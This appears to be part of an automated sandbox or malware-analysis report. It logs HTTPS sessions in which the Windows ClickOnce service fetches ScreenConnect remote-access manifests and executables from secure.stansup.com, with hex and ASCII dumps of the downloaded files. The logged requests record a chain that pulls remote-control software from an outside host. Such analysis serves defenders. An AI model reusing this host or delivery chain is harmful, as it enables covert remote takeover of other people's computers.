                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                      Content-Length: 118229
                                                                                                                                                                                                                                                      Content-Type: application/x-ms-application; charset=utf-8
                                                                                                                                                                                                                                                      Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                      Date: Fri, 25 Oct 2024 17:27:17 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-10-25 17:27:17 UTC16134INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 32 3d
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=
                                                                                                                                                                                                                                                      2024-10-25 17:27:17 UTC16384INData Raw: 38 6b 4a 65 66 2f 65 72 76 39 41 49 70 57 49 67 4b 51 6e 49 38 43 47 2f 69 6e 41 69 68 4f 72 67 4b 35 33 74 41 44 34 6d 31 44 42 50 74 30 44 67 58 49 7a 54 67 46 2f 38 37 58 42 54 6c 30 6f 77 5a 34 4d 74 73 47 4a 35 4d 43 43 4b 68 4f 6e 51 69 57 6f 4f 51 49 75 46 34 44 43 55 70 7a 4a 41 6e 59 54 56 4d 4a 59 33 49 57 43 32 45 66 6e 67 77 71 57 79 4d 4e 72 6f 68 4e 44 76 56 58 56 41 35 53 5a 4a 6f 4f 4d 77 4f 39 44 74 4d 62 67 67 38 54 52 50 49 50 55 6c 52 38 45 41 47 6c 69 52 47 38 79 66 59 52 6f 64 77 71 45 6c 46 44 4c 68 4b 54 47 45 6b 53 6b 48 75 45 45 6c 4f 31 6d 42 49 59 67 77 51 54 4d 39 72 37 45 35 69 6e 4a 52 53 58 55 49 59 55 79 31 33 46 46 43 58 6b 4e 52 56 67 42 49 49 56 64 59 61 51 46 57 34 36 48 68 59 43 77 4a 63 57 48 61 72 43 46 67 30 41 33
                                                                                                                                                                                                                                                      Data Ascii: 8kJef/erv9AIpWIgKQnI8CG/inAihOrgK53tAD4m1DBPt0DgXIzTgF/87XBTl0owZ4MtsGJ5MCCKhOnQiWoOQIuF4DCUpzJAnYTVMJY3IWC2EfngwqWyMNrohNDvVXVA5SZJoOMwO9DtMbgg8TRPIPUlR8EAGliRG8yfYRodwqElFDLhKTGEkSkHuEElO1mBIYgwQTM9r7E5inJRSXUIYUy13FFCXkNRVgBIIVdYaQFW46HhYCwJcWHarCFg0A3
                                                                                                                                                                                                                                                      2024-10-25 17:27:17 UTC16384INData Raw: 42 6c 41 48 49 41 56 41 42 70 41 48 51 41 62 41 42 6c 41 41 4d 4e 41 41 42 49 51 77 42 76 41 47 34 41 64 41 42 79 41 47 38 41 62 41 42 51 41 47 45 41 62 67 42 6c 41 47 77 41 54 51 42 68 41 47 34 41 59 51 42 6e 41 47 55 41 51 77 42 68 41 48 41 41 64 41 42 31 41 48 49 41 5a 51 42 47 41 47 38 41 62 41 42 6b 41 47 55 41 63 67 42 55 41 47 6b 41 64 41 42 73 41 47 55 41 43 77 30 41 41 46 42 44 41 47 38 41 62 67 42 30 41 48 49 41 62 77 42 73 41 46 41 41 59 51 42 75 41 47 55 41 62 41 42 4e 41 47 45 41 62 67 42 68 41 47 63 41 5a 51 42 44 41 48 49 41 5a 51 42 6b 41 47 55 41 62 67 42 30 41 47 6b 41 59 51 42 73 41 48 4d 41 52 41 42 6c 41 48 4d 41 59 77 42 79 41 47 6b 41 63 41 42 30 41 47 6b 41 62 77 42 75 41 43 49 4e 41 41 42 45 51 77 42 76 41 47 34 41 64 41 42 79 41
                                                                                                                                                                                                                                                      Data Ascii: BlAHIAVABpAHQAbABlAAMNAABIQwBvAG4AdAByAG8AbABQAGEAbgBlAGwATQBhAG4AYQBnAGUAQwBhAHAAdAB1AHIAZQBGAG8AbABkAGUAcgBUAGkAdABsAGUACw0AAFBDAG8AbgB0AHIAbwBsAFAAYQBuAGUAbABNAGEAbgBhAGcAZQBDAHIAZQBkAGUAbgB0AGkAYQBsAHMARABlAHMAYwByAGkAcAB0AGkAbwBuACINAABEQwBvAG4AdAByA
                                                                                                                                                                                                                                                      2024-10-25 17:27:17 UTC16384INData Raw: 51 41 61 51 42 68 41 47 77 41 62 77 42 6e 41 45 4d 41 62 77 42 75 41 47 59 41 61 51 42 6e 41 48 55 41 63 67 42 6c 41 46 41 41 5a 51 42 79 41 47 30 41 61 51 42 7a 41 48 4d 41 61 51 42 76 41 47 34 41 51 67 42 31 41 48 51 41 64 41 42 76 41 47 34 41 56 41 42 6c 41 48 67 41 64 41 42 6b 4c 51 41 41 62 6b 30 41 59 51 42 6a 41 45 63 41 63 67 42 68 41 47 34 41 64 41 42 42 41 47 4d 41 59 77 42 6c 41 48 4d 41 63 77 42 70 41 47 49 41 61 51 42 73 41 47 6b 41 64 41 42 35 41 46 41 41 5a 51 42 79 41 47 30 41 61 51 42 7a 41 48 4d 41 61 51 42 76 41 47 34 41 63 77 42 45 41 47 6b 41 59 51 42 73 41 47 38 41 5a 77 42 55 41 47 55 41 65 41 42 30 41 45 4d 41 62 77 42 75 41 48 51 41 5a 51 42 75 41 48 51 41 52 67 42 76 41 48 49 41 62 51 42 68 41 48 51 41 65 79 30 41 41 45 35 4e 41
                                                                                                                                                                                                                                                      Data Ascii: QAaQBhAGwAbwBnAEMAbwBuAGYAaQBnAHUAcgBlAFAAZQByAG0AaQBzAHMAaQBvAG4AQgB1AHQAdABvAG4AVABlAHgAdABkLQAAbk0AYQBjAEcAcgBhAG4AdABBAGMAYwBlAHMAcwBpAGIAaQBsAGkAdAB5AFAAZQByAG0AaQBzAHMAaQBvAG4AcwBEAGkAYQBsAG8AZwBUAGUAeAB0AEMAbwBuAHQAZQBuAHQARgBvAHIAbQBhAHQAey0AAE5NA
                                                                                                                                                                                                                                                      2024-10-25 17:27:18 UTC16384INData Raw: 39 32 61 57 52 6c 63 67 46 65 51 32 68 76 62 33 4e 6c 49 48 52 6f 5a 53 42 30 62 32 39 73 49 48 56 7a 5a 57 51 67 64 47 38 67 63 32 56 73 5a 57 4e 30 49 47 45 67 63 6d 56 6e 61 57 39 75 49 47 39 6d 49 48 52 6f 5a 53 42 7a 59 33 4a 6c 5a 57 34 67 5a 6d 39 79 49 47 39 77 64 47 6c 6a 59 57 77 67 59 32 68 68 63 6d 46 6a 64 47 56 79 49 48 4a 6c 59 32 39 6e 62 6d 6c 30 61 57 39 75 49 43 68 50 51 31 49 70 4c 67 45 4c 55 32 56 73 5a 57 4e 30 49 46 52 76 62 32 77 42 50 45 4e 6f 62 32 39 7a 5a 53 42 33 61 47 6c 6a 61 43 42 73 62 32 64 76 62 69 42 7a 5a 58 4e 7a 61 57 39 75 49 48 52 76 49 47 4e 76 62 6e 52 79 62 32 77 67 62 32 34 67 64 47 68 6c 49 48 4a 6c 62 57 39 30 5a 53 42 74 59 57 4e 6f 61 57 35 6c 4c 67 45 55 55 32 56 73 5a 57 4e 30 49 45 78 76 5a 32 39 75 49
                                                                                                                                                                                                                                                      Data Ascii: 92aWRlcgFeQ2hvb3NlIHRoZSB0b29sIHVzZWQgdG8gc2VsZWN0IGEgcmVnaW9uIG9mIHRoZSBzY3JlZW4gZm9yIG9wdGljYWwgY2hhcmFjdGVyIHJlY29nbml0aW9uIChPQ1IpLgELU2VsZWN0IFRvb2wBPENob29zZSB3aGljaCBsb2dvbiBzZXNzaW9uIHRvIGNvbnRyb2wgb24gdGhlIHJlbW90ZSBtYWNoaW5lLgEUU2VsZWN0IExvZ29uI
                                                                                                                                                                                                                                                      2024-10-25 17:27:18 UTC16384INData Raw: 4f 76 65 72 72 69 64 65 2e 65 6e 2d 55 53 2e 72 65 73 6f 75 72 63 65 73 2d 2d 3e 3c 21 2d 2d 7a 73 72 76 76 67 45 41 41 41 43 52 41 41 41 41 62 46 4e 35 63 33 52 6c 62 53 35 53 5a 58 4e 76 64 58 4a 6a 5a 58 4d 75 55 6d 56 7a 62 33 56 79 59 32 56 53 5a 57 46 6b 5a 58 49 73 49 47 31 7a 59 32 39 79 62 47 6c 69 4c 43 42 57 5a 58 4a 7a 61 57 39 75 50 54 51 75 4d 43 34 77 4c 6a 41 73 49 45 4e 31 62 48 52 31 63 6d 55 39 62 6d 56 31 64 48 4a 68 62 43 77 67 55 48 56 69 62 47 6c 6a 53 32 56 35 56 47 39 72 5a 57 34 39 59 6a 63 33 59 54 56 6a 4e 54 59 78 4f 54 4d 30 5a 54 41 34 4f 53 4e 54 65 58 4e 30 5a 57 30 75 55 6d 56 7a 62 33 56 79 59 32 56 7a 4c 6c 4a 31 62 6e 52 70 62 57 56 53 5a 58 4e 76 64 58 4a 6a 5a 56 4e 6c 64 41 49 41 41 41 41 43 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: Override.en-US.resources-->...zsrvvgEAAACRAAAAbFN5c3RlbS5SZXNvdXJjZXMuUmVzb3VyY2VSZWFkZXIsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNldAIAAAACAAAAAAAA
                                                                                                                                                                                                                                                      2024-10-25 17:27:18 UTC16384INData Raw: 73 37 54 2f 44 67 45 48 4a 4c 4d 55 4f 73 70 39 48 48 38 6e 78 77 44 41 31 57 34 53 63 76 6c 62 37 54 56 77 55 71 59 45 58 6b 48 41 49 58 6d 7a 46 6e 6b 6a 31 6d 32 79 44 41 42 45 6f 64 39 71 70 6f 48 62 70 55 72 67 42 67 4b 57 63 67 30 63 34 7a 36 4f 62 38 6b 7a 41 42 43 46 66 6e 39 6a 37 50 2b 58 64 69 69 42 34 78 56 77 35 6d 33 67 2b 50 5a 78 50 43 66 52 41 4d 44 2f 6b 76 61 6b 75 75 47 6a 39 39 2b 36 6b 56 41 43 78 79 76 67 62 58 63 66 78 30 32 75 67 41 45 67 63 6b 5a 54 75 57 37 77 50 34 73 30 4c 68 44 46 37 69 7a 70 76 30 66 41 59 66 64 78 72 45 58 63 69 4d 55 55 4d 41 43 34 58 4d 67 38 65 36 35 75 46 71 6c 51 73 54 2f 62 52 37 6d 32 69 6f 44 6c 37 4f 4d 34 59 67 6f 59 41 43 4b 6c 4e 5a 69 4b 74 34 50 76 51 2b 68 43 6b 31 61 36 6e 32 53 49 53 73 41
                                                                                                                                                                                                                                                      Data Ascii: s7T/DgEHJLMUOsp9HH8nxwDA1W4Scvlb7TVwUqYEXkHAIXmzFnkj1m2yDABEod9qpoHbpUrgBgKWcg0c4z6Ob8kzABCFfn9j7P+XdiiB4xVw5m3g+PZxPCfRAMD/kvakuuGj99+6kVACxyvgbXcfx02ugAEgckZTuW7wP4s0LhDF7izpv0fAYfdxrEXciMUUMAC4XMg8e65uFqlQsT/bR7m2ioDl7OM4YgoYACKlNZiKt4PvQ+hCk1a6n2SISsA
                                                                                                                                                                                                                                                      2024-10-25 17:27:18 UTC3791INData Raw: 62 63 41 41 43 4f 42 36 74 69 49 74 61 41 4d 47 51 41 44 6e 6e 38 59 78 68 6d 33 41 54 78 78 52 41 41 48 73 43 6e 79 33 31 56 37 2b 7a 6d 73 44 42 6b 41 41 35 37 6f 43 32 77 59 4d 67 41 41 65 77 7a 53 4f 56 46 6f 75 39 67 4a 34 58 78 63 53 41 41 49 34 31 30 44 4b 70 66 67 32 34 4b 64 4f 4b 49 41 41 31 6f 71 55 6d 4d 61 78 33 77 76 67 78 61 67 41 66 75 47 45 41 67 68 67 74 69 77 6a 42 45 41 41 31 2b 34 4b 50 4e 38 4c 34 4e 57 6f 41 48 37 6b 68 41 49 49 59 47 5a 32 4d 69 38 6a 74 41 73 4a 51 41 42 7a 61 61 39 51 46 39 4b 43 58 55 67 41 43 4f 42 63 30 7a 6a 47 73 49 78 77 7a 51 45 46 45 4d 41 6b 70 6e 47 4d 59 52 6d 68 49 6d 67 41 41 55 7a 71 43 6a 79 47 4c 69 52 46 30 41 41 43 6d 4e 51 56 65 41 7a 4c 43 46 38 36 6f 41 41 43 6d 4d 52 41 79 76 67 75 4a 45 58
                                                                                                                                                                                                                                                      Data Ascii: bcAACOB6tiItaAMGQADnn8Yxhm3ATxxRAAHsCny31V7+zmsDBkAA57oC2wYMgAAewzSOVFou9gJ4XxcSAAI410DKpfg24KdOKIAA1oqUmMax3wvgxagAfuGEAghgtiwjBEAA1+4KPN8L4NWoAH7khAIIYGZ2Mi8jtAsJQABzaa9QF9KCXUgACOBc0zjGsIxwzQEFEMAkpnGMYRmhImgAAUzqCjyGLiRF0AACmNQVeAzLCF86oAACmMRAyvguJEX


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      1192.168.2.104970879.110.49.1854437740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-10-25 17:27:19 UTC100OUTGET /Bin/ScreenConnect.Client.manifest HTTP/1.1
                                                                                                                                                                                                                                                      Host: secure.stansup.com
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      2024-10-25 17:27:20 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                      Content-Length: 17858
                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                      Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                      Date: Fri, 25 Oct 2024 17:27:19 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-10-25 17:27:20 UTC16169INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv
                                                                                                                                                                                                                                                      2024-10-25 17:27:20 UTC1689INData Raw: 75 66 63 78 34 64 79 74 35 42 69 67 32 4d 45 6a 52 30 65 7a 6f 51 39 75 6f 36 74 74 6d 41 61 44 47 37 64 71 5a 79 33 53 76 55 51 61 6b 68 43 42 6a 37 41 37 43 64 66 48 6d 7a 4a 61 77 76 39 71 59 46 53 4c 53 63 47 54 37 65 47 30 58 4f 42 76 36 79 62 35 6a 4e 57 79 2b 54 67 51 35 75 72 4f 6b 66 57 2b 30 2f 74 76 6b 32 45 30 58 4c 79 54 52 53 69 44 4e 69 70 6d 4b 46 2b 77 63 38 36 4c 4a 69 55 47 73 6f 50 55 58 50 59 56 47 55 7a 74 59 75 42 65 4d 2f 4c 6f 36 4f 77 4b 70 37 41 44 4b 35 47 79 4e 6e 6d 2b 39 36 30 49 48 6e 57 6d 5a 63 79 37 34 30 68 51 38 33 65 52 47 76 37 62 55 4b 4a 47 79 47 46 59 6d 50 56 38 41 68 59 38 67 79 69 74 4f 59 62 73 31 4c 63 4e 55 39 44 34 52 2b 5a 31 4d 49 33 73 4d 4a 4e 32 46 4b 5a 62 53 31 31 30 59 55 30 2f 45 70 46 32 33 72 39
                                                                                                                                                                                                                                                      Data Ascii: ufcx4dyt5Big2MEjR0ezoQ9uo6ttmAaDG7dqZy3SvUQakhCBj7A7CdfHmzJawv9qYFSLScGT7eG0XOBv6yb5jNWy+TgQ5urOkfW+0/tvk2E0XLyTRSiDNipmKF+wc86LJiUGsoPUXPYVGUztYuBeM/Lo6OwKp7ADK5GyNnm+960IHnWmZcy740hQ83eRGv7bUKJGyGFYmPV8AhY8gyitOYbs1LcNU9D4R+Z1MI3sMJN2FKZbS110YU0/EpF23r9


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      2192.168.2.104971979.110.49.1854437740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-10-25 17:27:25 UTC126OUTGET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
                                                                                                                                                                                                                                                      Host: secure.stansup.com
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      2024-10-25 17:27:26 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                      Content-Length: 95520
                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                      Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                      Date: Fri, 25 Oct 2024 17:27:25 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-10-25 17:27:26 UTC16169INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f8 10 28 a3 bc 71 46 f0 bc 71 46 f0 bc 71 46 f0 08 ed b7 f0 b6 71 46 f0 08 ed b5 f0 c6 71 46 f0 08 ed b4 f0 a4 71 46 f0 3c 0a 42 f1 ad 71 46 f0 3c 0a 45 f1 a8 71 46 f0 3c 0a 43 f1 96 71 46 f0 b5 09 d5 f0 b6 71 46 f0 a2 23 d5 f0 bf 71 46 f0 bc 71 47 f0 cc 71 46 f0 32 0a 4f f1 bd 71 46 f0 32 0a b9 f0 bd 71 46 f0 32 0a 44 f1 bd 71 46 f0 52 69 63 68 bc 71 46 f0 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(qFqFqFqFqFqF<BqF<EqF<CqFqF#qFqGqF2OqF2qF2DqFRichqF
                                                                                                                                                                                                                                                      2024-10-25 17:27:26 UTC16384INData Raw: 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e4 d0 40 00 5e 5d c3 55 8b ec 56 68 90 dd 40 00 68 88 dd 40 00 68 90 dd 40 00 6a 03 e8 4a fe ff ff 83 c4 10 8b f0 ff 75 0c ff 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e8 d0 40 00 5e 5d c3 55 8b ec 56 68 a4 dd 40 00 68 9c dd 40 00 68 a4 dd 40 00 6a 04 e8 0c fe ff ff 8b f0 83 c4 10 85 f6 74 15 ff 75 10 8b ce ff 75 0c ff 75 08 ff 15 88 d1 40 00 ff d6 eb 0c ff 75 0c ff 75 08 ff 15 60 d0 40 00 5e 5d c3 56 e8 56 ed ff ff 8b 70 04 85 f6 74 0a 8b ce ff 15 88 d1 40 00 ff d6 e8 de 15 00 00 cc 55 8b ec 8b 45 10 8b 4d 08 81 78 04 80 00 00 00 7f 06 0f be 41 08 5d c3 8b 41 08 5d c3 55 8b ec 8b 45 08 8b 4d 10 89 48 08 5d c3 53 51 bb 30 40 41 00 e9 0f 00 00 00 cc cc cc cc 53 51 bb 30 40 41 00 8b
                                                                                                                                                                                                                                                      Data Ascii: t@@^]UVh@h@h@jJuut@@^]UVh@h@h@jtuuu@uu`@^]VVpt@UEMxA]A]UEMH]SQ0@ASQ0@A
                                                                                                                                                                                                                                                      2024-10-25 17:27:26 UTC16384INData Raw: 01 8b 88 80 00 00 00 85 c9 74 03 f0 ff 01 8b 88 8c 00 00 00 85 c9 74 03 f0 ff 01 56 6a 06 8d 48 28 5e 81 79 f8 38 46 41 00 74 09 8b 11 85 d2 74 03 f0 ff 02 83 79 f4 00 74 0a 8b 51 fc 85 d2 74 03 f0 ff 02 83 c1 10 83 ee 01 75 d6 ff b0 9c 00 00 00 e8 4e 01 00 00 59 5e 5d c3 8b ff 55 8b ec 51 53 56 8b 75 08 57 8b 86 88 00 00 00 85 c0 74 6c 3d 48 46 41 00 74 65 8b 46 7c 85 c0 74 5e 83 38 00 75 59 8b 86 84 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 30 d9 ff ff ff b6 88 00 00 00 e8 28 fb ff ff 59 59 8b 86 80 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 0e d9 ff ff ff b6 88 00 00 00 e8 04 fc ff ff 59 59 ff 76 7c e8 f9 d8 ff ff ff b6 88 00 00 00 e8 ee d8 ff ff 59 59 8b 86 8c 00 00 00 85 c0 74 45 83 38 00 75 40 8b 86 90 00 00 00 2d fe 00 00 00 50 e8 cc d8 ff ff 8b 86
                                                                                                                                                                                                                                                      Data Ascii: ttVjH(^y8FAttytQtuNY^]UQSVuWtl=HFAteF|t^8uYt8uP0(YYt8uPYYv|YYtE8u@-P
                                                                                                                                                                                                                                                      2024-10-25 17:27:26 UTC16384INData Raw: 72 09 8b 48 08 03 ce 3b f9 72 0a 42 83 c0 28 3b d3 72 e8 33 c0 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a fe 68 20 2e 41 00 68 80 36 40 00 64 a1 00 00 00 00 50 83 ec 08 53 56 57 a1 04 40 41 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 89 65 e8 c7 45 fc 00 00 00 00 68 00 00 40 00 e8 7c 00 00 00 83 c4 04 85 c0 74 54 8b 45 08 2d 00 00 40 00 50 68 00 00 40 00 e8 52 ff ff ff 83 c4 08 85 c0 74 3a 8b 40 24 c1 e8 1f f7 d0 83 e0 01 c7 45 fc fe ff ff ff 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 8b 45 ec 8b 00 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 c3 8b 65 e8 c7 45 fc fe ff ff ff 33 c0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc 55 8b ec 8b 45 08 b9 4d 5a 00 00 66 39 08 75 1d 8b 48 3c 03 c8 81 39 50
                                                                                                                                                                                                                                                      Data Ascii: rH;rB(;r3_^[]Ujh .Ah6@dPSVW@A1E3PEdeEh@|tTE-@Ph@Rt:@$EMdY_^[]E38eE3MdY_^[]UEMZf9uH<9P
                                                                                                                                                                                                                                                      2024-10-25 17:27:26 UTC16384INData Raw: 00 65 00 2d 00 61 00 74 00 00 00 64 00 65 00 2d 00 63 00 68 00 00 00 64 00 65 00 2d 00 64 00 65 00 00 00 64 00 65 00 2d 00 6c 00 69 00 00 00 64 00 65 00 2d 00 6c 00 75 00 00 00 64 00 69 00 76 00 2d 00 6d 00 76 00 00 00 00 00 65 00 6c 00 2d 00 67 00 72 00 00 00 65 00 6e 00 2d 00 61 00 75 00 00 00 65 00 6e 00 2d 00 62 00 7a 00 00 00 65 00 6e 00 2d 00 63 00 61 00 00 00 65 00 6e 00 2d 00 63 00 62 00 00 00 65 00 6e 00 2d 00 67 00 62 00 00 00 65 00 6e 00 2d 00 69 00 65 00 00 00 65 00 6e 00 2d 00 6a 00 6d 00 00 00 65 00 6e 00 2d 00 6e 00 7a 00 00 00 65 00 6e 00 2d 00 70 00 68 00 00 00 65 00 6e 00 2d 00 74 00 74 00 00 00 65 00 6e 00 2d 00 75 00 73 00 00 00 65 00 6e 00 2d 00 7a 00 61 00 00 00 65 00 6e 00 2d 00 7a 00 77 00 00 00 65 00 73 00 2d 00 61 00 72 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: e-atde-chde-dede-lide-ludiv-mvel-gren-auen-bzen-caen-cben-gben-ieen-jmen-nzen-phen-tten-usen-zaen-zwes-ar
                                                                                                                                                                                                                                                      2024-10-25 17:27:26 UTC13815INData Raw: 33 30 33 9a 33 a1 33 b3 33 bc 33 04 34 16 34 1e 34 28 34 31 34 42 34 54 34 6f 34 af 34 c1 34 c7 34 db 34 2f 35 39 35 3f 35 45 35 b0 35 b9 35 f2 35 fd 35 f2 37 25 38 2a 38 50 39 68 39 95 39 b0 39 c0 39 c5 39 cf 39 d4 39 df 39 ea 39 fe 39 4f 3a f6 3a 17 3b 70 3b 7b 3b ca 3b e2 3b 2c 3c c2 3c d9 3c 57 3d 9b 3d ad 3d e3 3d e8 3d f5 3d 01 3e 17 3e 2a 3e 5d 3e 6c 3e 71 3e 82 3e 88 3e 93 3e 9b 3e a6 3e ac 3e b7 3e bd 3e cb 3e d4 3e d9 3e e6 3e eb 3e f8 3e 06 3f 0d 3f 15 3f 2e 3f 40 3f 4c 3f 54 3f 6c 3f 91 3f a2 3f ab 3f f2 3f 00 60 00 00 18 01 00 00 26 30 4d 30 67 30 be 30 cb 30 d6 30 e0 30 e6 30 fa 30 06 31 7f 31 88 31 b4 31 bd 31 c5 31 e2 31 07 32 19 32 35 32 59 32 74 32 7f 32 25 33 d8 33 e1 33 e9 33 04 35 0a 35 1c 35 2f 35 7f 35 b0 35 e0 35 2b 36 27 37 3b 37
                                                                                                                                                                                                                                                      Data Ascii: 3033333444(414B4T4o44444/595?5E555557%8*8P9h9999999999O::;p;{;;;,<<<W======>>*>]>l>q>>>>>>>>>>>>>>>???.?@?L?T?l?????`&0M0g000000011111112252Y2t22%3333555/5555+6'7;7


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      3192.168.2.104972079.110.49.1854437740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-10-25 17:27:27 UTC134OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
                                                                                                                                                                                                                                                      Host: secure.stansup.com
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      2024-10-25 17:27:27 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                      Content-Length: 61216
                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                      Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                      Date: Fri, 25 Oct 2024 17:27:26 GMT
                                                                                                                                                                                                                                                      Connection: close
